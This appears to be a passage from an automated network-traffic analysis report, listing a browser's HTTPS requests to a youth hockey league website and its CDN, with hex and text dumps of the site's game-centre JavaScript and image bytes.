                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 68 69 73 2e 73 74 61 74 65 2e 6c 6f 61 64 69 6e 67 2e 69 73 5f 6c 6f 61 64 69 6e 67 5f 64 61 74 61 20 26 26 20 74 68 69 73 2e 73 74 61 74 65 2e 6c 6f 61 64 69 6e 67 2e 69 73 5f 6c 6f 61 64 69 6e 67 5f 6e 65 78 74 5f 70 61 67 65 20 3f 20 22 4c 6f 61 64 69 6e 67 20 4e 65 78 74 20 50 61 67 65 2e 2e 2e 22 20 3a 20 62 75 74 74 6f 6e 28 7b 0a 20 20 20 20 20 20 20 20 6f 6e 43 6c 69 63 6b 3a 20 74 68 69 73 2e 70 72 6f 70 73 2e 70 61 67 65 5f 66 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 28 6e 75 6c 6c 2c 20 4d 61 74 68 2e 6d 61 78 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 20 74 68 69 73 2e 73 74 61 74 65 2e 6c 6f 61 64 69 6e 67 2e 70 61 67 65 73 5f 6c 6f 61 64 65 64 29 20 2b 20 31 2c 20 74 68 69 73 2e 70 72 6f 70 73 2e 73 6f 72 74 5f 63 61 74 65 67 6f 72 79 29 0a 20 20 20 20
                                                                                                                          Data Ascii: his.state.loading.is_loading_data && this.state.loading.is_loading_next_page ? "Loading Next Page..." : button({ onClick: this.props.page_function.bind(null, Math.max.apply(null, this.state.loading.pages_loaded) + 1, this.props.sort_category)
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 74 68 69 73 2e 64 6f 65 73 6a 51 75 65 72 79 45 78 69 73 74 28 29 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 53 69 7a 65 4d 61 74 74 65 72 73 2e 70 72 6f 74 6f 74 79 70 65 2e 68 6f 77 4d 75 63 68 57 69 6c 6c 46 69 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 74 65 78 74 2c 20 70 61 72 61 6d 73 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 68 65 63 6b 44 69 72 65 63 74 69 6f 6e 2c 20 63 68 65 63 6b 49 6e 64 65 78 2c 20 63 6f 6d 70 61 72 69 73 6f 6e 48 65 69 67 68 74 2c 20 63 6f 6d 70 61 72 69 73 6f 6e 57 69 64 74 68 2c 20 63 75 72 72 65 6e 74 54 65 78 74 2c 20 64 69 6d 65 6e 73 69 6f 6e 73 2c 20 64 69 73 74 61 6e 63 65 2c 20 64 69 76 50 61 72 61 6d 73 2c 20 64 69 76 54
                                                                                                                          Data Ascii: this.doesjQueryExist()) { return false; } }; SizeMatters.prototype.howMuchWillFit = function(text, params) { var checkDirection, checkIndex, comparisonHeight, comparisonWidth, currentText, dimensions, distance, divParams, divT
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 61 77 61 79 5f 74 65 61 6d 5f 63 6f 64 65 3a 20 61 64 6a 75 73 74 54 65 61 6d 43 6f 64 65 28 5f 74 68 69 73 2e 70 72 6f 70 73 2e 61 6c 6c 5f 74 65 61 6d 73 5b 67 61 6d 65 2e 76 69 73 69 74 69 6e 67 5f 74 65 61 6d 5d 2e 74 65 61 6d 5f 63 6f 64 65 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 61 67 75 65 3a 20 5f 74 68 69 73 2e 70 72 6f 70 73 2e 6c 65 61 67 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 61 73 6f 6e 3a 20 5f 74 68 69 73 2e 70 72 6f 70 73 2e 73 65 61 73 6f 6e 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 61 6e 67 3a 20 5f 74 68 69 73 2e 70 72 6f 70 73 2e 6c 61 6e 67 0a 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 7d 29 28 74 68 69 73 29 29 29 29 29
                                                                                                                          Data Ascii: away_team_code: adjustTeamCode(_this.props.all_teams[game.visiting_team].team_code), league: _this.props.league, season: _this.props.season, lang: _this.props.lang }); }; })(this)))))
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 20 20 69 73 4f 76 65 72 74 69 6d 65 33 47 61 6d 65 3a 20 66 75 6e 63 74 69 6f 6e 28 64 61 74 61 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 64 61 74 61 2e 68 6f 6d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 36 22 29 20 7c 7c 20 64 61 74 61 2e 76 69 73 69 74 69 6e 67 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 36 22 29 3b 0a 20 20 20 20 7d 2c 0a 20 20 20 20 69 73 53 68 6f 6f 74 6f 75 74 47 61 6d 65 3a 20 66 75 6e 63 74 69 6f 6e 28 64 61 74 61 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 64 61 74 61 2e 68 6f 6d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 53 4f 22 29 20 7c 7c 20 64 61 74 61 2e 76 69 73 69 74 69 6e 67 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 53 4f 22 29 3b 0a 20 20 20 20 7d 0a 20 20 7d 3b 0a
                                                                                                                          Data Ascii: isOvertime3Game: function(data) { return data.home.hasOwnProperty("6") || data.visiting.hasOwnProperty("6"); }, isShootoutGame: function(data) { return data.home.hasOwnProperty("SO") || data.visiting.hasOwnProperty("SO"); } };
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 2c 20 74 68 69 73 2e 69 73 4f 76 65 72 74 69 6d 65 47 61 6d 65 28 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 29 20 3f 20 74 68 28 7b 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 4e 61 6d 65 3a 20 22 74 61 62 6c 65 5f 5f 74 68 2d 2d 64 61 72 6b 22 0a 20 20 20 20 20 20 7d 2c 20 63 70 6c 5f 6c 31 30 6e 2e 6f 74 29 20 3a 20 76 6f 69 64 20 30 2c 20 74 68 69 73 2e 69 73 4f 76 65 72 74 69 6d 65 32 47 61 6d 65 28 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 29 20 3f 20 74 68 28 7b 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 4e 61 6d 65 3a 20 22 74 61 62 6c 65 5f 5f 74 68 2d 2d 64 61 72 6b 22 0a 20 20 20 20 20 20 7d 2c 20 63 70 6c 5f 6c 31 30 6e 2e 6f 74 32 29 20 3a 20 76 6f 69 64 20 30 2c 20 74 68 69 73 2e 69 73 4f 76 65 72 74 69 6d 65 33 47 61 6d 65 28 74 68 69 73
                                                                                                                          Data Ascii: , this.isOvertimeGame(this.props.data) ? th({ className: "table__th--dark" }, cpl_l10n.ot) : void 0, this.isOvertime2Game(this.props.data) ? th({ className: "table__th--dark" }, cpl_l10n.ot2) : void 0, this.isOvertime3Game(this
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 7b 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 4e 61 6d 65 3a 20 22 67 61 6d 65 63 65 6e 74 72 65 2d 74 6f 70 73 63 6f 72 65 72 73 22 0a 20 20 20 20 20 20 7d 2c 20 68 35 28 7b 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 4e 61 6d 65 3a 20 22 70 61 67 65 2d 73 75 62 74 69 74 6c 65 22 0a 20 20 20 20 20 20 7d 2c 20 63 70 6c 5f 6c 31 30 6e 2e 74 6f 70 5f 73 63 6f 72 65 72 73 29 2c 20 54 6f 70 53 63 6f 72 65 72 73 54 61 62 6c 65 28 7b 0a 20 20 20 20 20 20 20 20 6c 65 61 67 75 65 3a 20 74 68 69 73 2e 70 72 6f 70 73 2e 6c 65 61 67 75 65 2c 0a 20 20 20 20 20 20 20 20 68 6f 6d 65 3a 20 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 2e 68 6f 6d 65 5f 74 65 61 6d 2c 0a 20 20 20 20 20 20 20 20 61 77 61 79 3a 20 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 2e 76 69 73 69 74
                                                                                                                          Data Ascii: { className: "gamecentre-topscorers" }, h5({ className: "page-subtitle" }, cpl_l10n.top_scorers), TopScorersTable({ league: this.props.league, home: this.props.data.home_team, away: this.props.data.visit
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 74 69 76 65 5f 67 61 6d 65 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 69 73 5f 73 68 6f 6f 74 6f 75 74 5f 67 61 6d 65 3a 20 66 61 6c 73 65 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 7d 2c 0a 20 20 20 20 67 65 74 49 6e 69 74 69 61 6c 53 74 61 74 65 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 7b 0a 20 20 20 20 20 20 20 20 69 73 5f 6d 6f 62 69 6c 65 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 73 68 6f 77 5f 73 65 74 74 69 6e 67 73 5f 77 69 6e 64 6f 77 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 70 65 72 69 6f 64 73 3a 20 7b 7d 2c 0a 20 20 20 20 20 20 20 20 6f 70 74 69 6f 6e 73 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 67 6f 61 6c 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 61 62 65 6c 3a 20
                                                                                                                          Data Ascii: tive_game: false, is_shootout_game: false }; }, getInitialState: function() { return { is_mobile: false, show_settings_window: false, periods: {}, options: { goal: { label:
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 5f 6a 65 72 73 65 79 5f 6e 75 6d 62 65 72 3a 20 70 6c 61 79 2e 67 6f 61 6c 5f 73 63 6f 72 65 72 2e 6a 65 72 73 65 79 5f 6e 75 6d 62 65 72 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 5f 70 6c 61 79 65 72 5f 6e 61 6d 65 3a 20 70 6c 61 79 2e 67 6f 61 6c 5f 73 63 6f 72 65 72 2e 66 69 72 73 74 5f 6e 61 6d 65 20 2b 20 22 20 22 20 2b 20 70 6c 61 79 2e 67 6f 61 6c 5f 73 63 6f 72 65 72 2e 6c 61 73 74 5f 6e 61 6d 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 68 6f 77 5f 62 6f 74 74 6f 6d 5f 6c 69 6e 65 3a 20 66 61 6c 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 22 68 69 74 22 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72
                                                                                                                          Data Ascii: , top_jersey_number: play.goal_scorer.jersey_number, top_player_name: play.goal_scorer.first_name + " " + play.goal_scorer.last_name, show_bottom_line: false }); case "hit": retur
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 7d 2c 0a 20 20 20 20 73 68 6f 77 50 6c 61 79 65 72 54 65 78 74 4c 65 67 65 6e 64 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 28 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 2e 76 69 73 69 74 6f 72 5f 74 65 61 6d 5f 6c 69 6e 65 75 70 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 70 6c 61 79 65 72 73 22 29 20 26 26 20 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 2e 76 69 73 69 74 6f 72 5f 74 65 61 6d 5f 6c 69 6e 65 75 70 2e 70 6c 61 79 65 72 73 2e 6c 65 6e 67 74 68 20 3e 20 30 29 20 7c 7c 20 28 74 68 69 73 2e 70 72 6f 70 73 2e 64 61 74 61 2e 68 6f 6d 65 5f 74 65 61 6d 5f 6c 69 6e 65 75 70 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 70 6c 61 79
                                                                                                                          Data Ascii: } }; }, showPlayerTextLegend: function() { return (this.props.data.visitor_team_lineup.hasOwnProperty("players") && this.props.data.visitor_team_lineup.players.length > 0) || (this.props.data.home_team_lineup.hasOwnProperty("play


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          44192.168.11.2049845137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC622OUTGET /app/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=4.5.3 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:16 UTC518INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 327
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 960893682 961417554
                                                                                                                          Age: 82
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-147"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:16 UTC327INData Raw: 0a 69 63 6c 5f 6c 61 6e 67 20 3d 20 69 63 6c 5f 76 61 72 73 2e 63 75 72 72 65 6e 74 5f 6c 61 6e 67 75 61 67 65 3b 0a 69 63 6c 5f 68 6f 6d 65 20 3d 20 69 63 6c 5f 76 61 72 73 2e 69 63 6c 5f 68 6f 6d 65 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 61 64 64 4c 6f 61 64 45 76 65 6e 74 28 66 75 6e 63 29 20 7b 0a 20 20 76 61 72 20 6f 6c 64 6f 6e 6c 6f 61 64 20 3d 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3b 0a 20 20 69 66 20 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 21 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 3b 0a 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 69 66
                                                                                                                          Data Ascii: icl_lang = icl_vars.current_language;icl_home = icl_vars.icl_home;function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function() { if


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          45192.168.11.204984854.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC671OUTGET /app/uploads/gthl/2024/12/23150859/2025-GTHL-Playoffs-1600x900-Web-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:16 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 55635
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:17 GMT
                                                                                                                          Last-Modified: Mon, 23 Dec 2024 20:09:00 GMT
                                                                                                                          ETag: "7afc5f802a25b045e6029fed8ec78a9c"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 924c3fd5fff04ef5cac09fbfc470e618.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: QMtkwBrTSrNE3rzPblxcFIqcA70zA6U7gq3kNdkVb6mwafyRUjZ1IA==
                                                                                                                          2025-01-13 21:01:16 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 00 08 09 ff c4 00 5e 10 00 01 03 03 02 03 05 04 07 03 08 04 09 09 05 09 01 02 03 04 00 05 11 06 21 07 12 31 08 13 41 51 61 14 22 71 81 15 23 32 42 52
                                                                                                                          Data Ascii: JFIF&&CC"^!1AQa"q#2BR
                                                                                                                          2025-01-13 21:01:17 UTC8787INData Raw: a9 6a 42 95 82 49 00 0f 8f 95 7a 03 84 9c 24 93 78 b8 4b 1c 5e ec b9 c3 5d 29 66 87 17 99 b7 d8 4b 32 1d 71 c0 46 c7 72 02 42 41 25 47 d3 d6 bc 83 ad f8 eb a2 b4 c7 1a b5 2d fb 87 9c 26 d0 f3 6c cd 91 6d b6 b7 32 db ce c2 5a 6f 65 3c 86 d2 52 82 a7 15 93 cc 41 38 c0 18 ad 9d 45 df 57 c7 6b 9c 74 6a 34 37 92 c5 72 68 9f 97 cd 79 cf 06 c0 3a bf 57 92 08 58 32 44 0d 0e 70 d1 87 e5 b8 bb 66 b4 c9 1b 0d 1f e6 d8 ff 00 29 1e e5 01 60 ed 13 da 77 54 5f 20 69 cb 1f 15 35 34 ab 85 ca 43 71 63 32 99 3b ad c5 a8 04 8e 9e 66 bd 8d 23 85 3c 4c d0 ba 76 1d d7 8c 7d b5 6e fa 7a 44 b2 1b c2 5c 6d 0c 07 71 92 84 ad c5 02 b2 3c f0 3e 15 96 f0 71 be d0 1c 49 d4 fa 73 8e fa 4f 82 7a 18 59 ac ea 90 c4 58 31 12 cd b1 b7 dd 29 28 5b dc db ac a9 39 20 28 e5 20 83 81 d4 d7 a0 35
                                                                                                                          Data Ascii: jBIz$xK^])fK2qFrBA%G-&lm2Zoe<RA8EWktj47rhy:WX2Dpf)`wT_ i54Cqc2;f#<Lv}nzD\mq<>qIsOzYX1)([9 ( 5
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: db 50 a2 9f 69 ce 0e 29 ff 00 f2 75 64 24 1c ac 8f ed 53 b1 a1 6c 00 01 ec 89 da 90 0f f5 52 74 d8 d4 29 a5 4b 77 c9 f3 a1 ef 87 9d 42 7d 20 9f c6 29 58 f2 1d 92 ae 46 52 55 fc 2a e0 42 e6 5a 96 ef 87 9d 0f 7a 9f 3a 2b 56 f5 14 82 eb 9b f9 0a 39 b7 34 7a ad 5f 9d 16 14 b7 40 1d 4f 98 a1 ef 47 9d 72 6d cd a7 a3 8a fc e8 7d 89 20 6e e1 a3 64 6e 80 ba 9c d1 92 b2 ad 92 09 a3 35 15 a4 fb c7 de 3e b4 b8 00 0c 00 05 22 53 a4 98 6d 67 ae 05 28 1a 1e 26 83 99 3d 33 43 51 4d 27 21 e8 b1 1a 53 f2 5d 43 6d a7 72 a5 1c 01 55 2b e5 f2 cd 78 41 87 12 2c c9 60 67 2e c7 18 08 3f 13 d6 a5 75 34 56 af b6 b7 ed 4c 3a 90 ea c1 20 93 b2 48 f1 f9 1a 86 b5 5b df d3 6e 46 87 de 3e e3 b3 14 12 a7 10 80 5b 4e 0f 8f 95 55 21 70 a0 38 ee b6 e3 47 0b 9a 5c f3 ed 0e 07 af cd 64 1a af
                                                                                                                          Data Ascii: Pi)ud$SlRt)KwB} )XFRU*BZz:+V94z_@OGrm} ndn5>"Smg(&=3CQM'!S]CmrU+xA,`g.?u4VL: H[nF>[NU!p8G\d
                                                                                                                          2025-01-13 21:01:17 UTC1024INData Raw: 79 bb 25 0f 72 b4 ac 04 7e b4 7b 4c 69 d7 95 05 3e e2 9b 6b 3d 33 b9 a7 55 ba 8b 5d bd 05 7b 87 7d 4c 85 72 b2 0a 80 f1 03 6a b3 da 1f 89 27 75 3e 52 b1 e1 55 26 93 1a db 13 95 a0 07 2a 6a 3f 4e 6a 76 17 39 ef 6a 4e 52 95 10 30 69 f7 56 e9 b1 4b 60 88 fa 14 90 02 b3 8d a9 d1 73 1b 0a a6 58 ee 17 2b a3 aa 5d b2 33 8b 65 27 1c de 1f 0c d5 aa 2c 3b 93 dc ae b8 02 37 c2 92 7a 8a d6 c9 2f 90 b0 4d 10 61 e5 38 52 b0 9f 8d 15 84 7b f9 34 e3 e8 f7 c8 fb 42 96 6a 02 d3 82 54 36 ab 75 05 9d 21 2d 44 16 d2 3c 55 4b 67 de c7 86 29 0b 82 16 db cc 64 65 3c dd 69 39 32 bb 97 d0 33 b2 85 47 94 24 af 8d ba 2d ee b9 1d 05 4a 4a 49 c0 af 27 6a 57 e5 5c 2f d2 94 ea 14 1c 2e 14 90 a1 d2 bd 67 3a e9 1e 14 55 48 90 b0 94 81 e3 58 66 a7 86 bb ee a1 93 a8 34 ac 05 a9 a8 6d 15 cc
                                                                                                                          Data Ascii: y%r~{Li>k=3U]{}Lrj'u>RU&*j?Njv9jNR0iVK`sX+]3e',;7z/Ma8R{4BjT6u!-D<UKg)de<i923G$-JJI'jW\/.g:UHXf4m
                                                                                                                          2025-01-13 21:01:17 UTC10138INData Raw: c2 50 41 0a 48 39 1e 35 73 b9 f1 4d 96 d0 e4 58 b1 90 e0 23 94 90 80 3f 5a cf 6e 77 27 6e 72 95 25 ec 64 f4 03 c0 55 0d 0e 2e b4 e4 d2 1b a4 72 ac 5c 3b 53 62 e4 f2 14 40 2a 6f 60 7c 6a fa b7 12 8f 95 63 51 a5 48 88 f2 64 46 71 4d b8 83 94 a9 3d 45 4c 8d 61 7f 50 c2 d6 85 8e 87 2d e3 3f 95 57 2c 25 ee b0 a7 0e 43 63 6e 92 b4 38 f7 17 8c e6 cb 07 60 70 45 3f e2 05 ce 34 5d 26 ec 47 dc 4f 7d 23 1c a9 07 7a ca dc bf dd dd 00 45 4a 99 3d 49 49 de 99 3f f4 a4 c5 85 cb 71 d7 0f 81 5a 89 a1 b0 6e 0f a2 4f c8 b0 42 43 38 ad 9b 41 71 06 c2 dd 8d 8b 7d ca 72 22 48 8c 39 30 e6 42 54 3c c1 ac 74 c3 7d 3b 28 81 f3 a1 11 5d 3b 05 1f ca ae 92 31 20 a2 a8 63 cb 0d 85 e9 98 7a 8a d1 35 95 3d 0e e9 19 e4 36 32 a2 87 01 c0 f5 a8 5b 8f 16 b4 a5 a8 2d b6 a5 2e 4b c9 cf ba d2
                                                                                                                          Data Ascii: PAH95sMX#?Znw'nr%dU.r\;Sb@*o`|jcQHdFqM=ELaP-?W,%Ccn8`pE?4]&GO}#zEJ=II?qZnOBC8Aq}r"H90BT<t};(];1 cz5=62[-.K
                                                                                                                          2025-01-13 21:01:17 UTC11110INData Raw: b6 c7 9f 15 6c 3c c7 79 cc 36 00 6f 9a 92 42 ca 81 e6 34 e2 03 29 e7 2f b8 76 4f 4a 95 5e c8 ba 59 3d ff 00 42 4a 8d 6c 32 90 da 93 21 0a e6 09 3b 9e 5f 2a cf de 0a 57 32 9d 1c ab 4e c4 56 e5 ac 2f 0d 46 65 d2 a5 8c ab dd 02 b2 4b eb 4d 26 2a e4 21 bc 29 67 cb 73 43 5d 47 4a 8c d1 8d 3a 82 ac 2d 40 1c 60 d1 d8 70 a0 82 09 0a 07 22 9e db ad 0e cb 84 ec d5 90 10 df 4f 5a 8e 29 e5 59 1b 82 2b 40 2b 9c e6 d6 eb d1 7c 1e e2 1a 6f 30 c5 8e e6 e8 12 e3 8c 20 93 f6 d3 5a a0 39 dc 57 8b ed 77 39 76 99 cc cf 86 e9 6d d6 54 08 20 fe 95 e9 ce 1d eb f8 3a b6 dc 84 a9 c0 89 6d 8c 3a d9 3b e7 ce ac e5 56 ae 95 d5 dd 7a 57 66 a2 85 d5 d5 d9 ae a1 0b a8 33 5c 4d 01 34 21 71 34 18 06 ba 86 9d a1 06 28 a6 8d 5c 46 69 82 95 22 e6 bb ad 01 a0 ef 12 36 34 d0 8d 41 81 e4 2b 81
                                                                                                                          Data Ascii: l<y6oB4)/vOJ^Y=BJl2!;_*W2NV/FeKM&*!)gsC]GJ:-@`p"OZ)Y+@+|o0 Z9Ww9vmT :m:;VzWf3\M4!q4(\Fi"64A+


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          46192.168.11.204984954.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC668OUTGET /app/uploads/gthl/2025/01/13092716/25-TP-Game-Move-1600x900-Web-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 54810
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:17 GMT
                                                                                                                          Last-Modified: Mon, 13 Jan 2025 14:27:18 GMT
                                                                                                                          ETag: "ee4428f72f40a9cd584a971cfc0a3999"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 1717f995f2ca7c5df4d0a972f90c1564.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: TcQUpePq0C2weCL_UzOFf2eLWvzPGk9sAdcwXveu-y_e3lHzJk4Zvw==
